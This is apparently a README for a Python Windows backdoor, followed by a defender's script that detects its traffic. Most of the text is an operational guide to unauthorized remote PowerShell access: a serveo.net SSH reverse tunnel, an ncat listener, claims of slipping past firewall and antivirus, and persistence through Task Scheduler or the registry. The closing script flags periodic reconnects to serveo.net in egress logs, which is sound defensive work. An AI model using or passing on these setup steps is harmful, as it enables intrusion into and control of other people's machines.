This project is a Python-based Windows backdoor that, once executed on the target PC, establishes a connection to a remote server hosted on SERVEO at a specified TCP port. The server then forwards the connection to the attacker's system, successfully bridging communication between the attacker's machine and the target system. This connection grants unauthorized access to the target machine and provides a PowerShell command interface. Through this interface, the attacker can remotely execute PowerShell commands on the compromised system.
The best part is that this works even if the firewall and antivirus are running, because all communication happens through an SSH tunnel.
- To get this working, a tool must be installed on YOUR PC (the attacker PC).
To receive the incoming backdoor connection and interact with it as a PowerShell command line, we use 'Netcat'. Netcat, also known as Ncat, is a powerful networking tool used for reading and writing to network connections using TCP or UDP protocols.
sudo apt install ncat
- This one command is enough to set up ncat on Linux.
For Windows, Netcat comes with a networking tool called 'Nmap':
- Go to the official Nmap site: https://nmap.org/download.html#windows
- Download nmap installer and run it.
- Check 'Ncat' in this window.
- Continue the installation with default settings after this.
As already mentioned, in order to receive connections from a public network we need a public server capable of forwarding them; for that, 'serveo' is the best option (it's an open source project).
- You can visit 'https://serveo.net' for more information.
ssh -R 61732:localhost:5555 serveo.net
- This command connects port 5555 on our local machine to port 61732 on the public server 'serveo'. Any TCP port in the range 49152–65535 will work; change the port number if it is not available.
- Make sure the port number here (in this case 61732) is the same as the port number in the Python code.
REMINDER: keep a dedicated terminal open running this ssh command in order for this to work.
After successful installation, you should see something like this when you run the command 'ncat':
Execute the command to start listening for connections:
ncat -lnvp 5555 #the same local port that you specified in ssh command
While the Python code is running on the target device, the connection will be established and you can start executing commands:
Tip
- Remember not to leave the terminal inactive: the connection will be lost, since the Python code tries to reconnect every 120 seconds (this delay can be modified in the code) when no activity is detected.
- If the terminal is stuck or not responding, just close the current terminal, open a new one and run the same ncat command; the Python code is configured to try to reconnect if the connection is closed.
- You can configure the system to start the program automatically on reboot. On Windows systems you can do this by using Task Scheduler or by tampering with the registry.
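
Seen from the defender's side, the behaviour this README describes (outbound TCP to serveo.net on a port in the 49152–65535 range, with a reconnect roughly every 120 seconds) leaves a regular pattern in egress logs. The following is an added example, not part of the original project, that flags that pattern; the log format, host names and thresholds are assumptions, and the sample lines are constructed.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample egress log (assumed format): time, source host, destination, port
SAMPLE_LOG = """\
2024-05-01T10:00:00 ws-017 serveo.net 61732
2024-05-01T10:00:05 ws-022 updates.example.com 443
2024-05-01T10:02:01 ws-017 serveo.net 61732
2024-05-01T10:03:40 ws-022 updates.example.com 443
2024-05-01T10:04:00 ws-017 serveo.net 61732
2024-05-01T10:06:02 ws-017 serveo.net 61732
2024-05-01T10:09:15 ws-031 files.example.org 50001
"""
WATCHED_DOMAINS = {"serveo.net"}      # tunnel service named on this page
DYNAMIC_PORTS = range(49152, 65536)   # port range the page gives for the tunnel

def parse(log):
    """Yield (timestamp, src, dst, port) tuples, skipping malformed lines."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[3].isdigit():
            continue
        try:
            ts = datetime.fromisoformat(parts[0])
        except ValueError:
            continue
        yield ts, parts[1], parts[2].lower(), int(parts[3])

def find_beacons(log, min_hits=3, max_jitter=10.0):
    """Report flows to a watched domain on a dynamic port that repeat at a steady interval."""
    flows = defaultdict(list)
    for ts, src, dst, port in parse(log):
        watched = dst in WATCHED_DOMAINS or any(dst.endswith("." + d) for d in WATCHED_DOMAINS)
        if watched and port in DYNAMIC_PORTS:
            flows[(src, dst, port)].append(ts)
    findings = []
    for key, times in flows.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Enough repeats, and reconnect gaps that barely vary, indicate automation
        if len(times) >= max(min_hits, 2) and pstdev(gaps) <= max_jitter:
            findings.append({"flow": key, "hits": len(times), "interval_s": round(mean(gaps))})
    return findings

if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_LOG):
        print(finding)
```

Because the reconnect delay can be changed in the code, treat the interval as a reported value rather than a fixed match on 120 seconds.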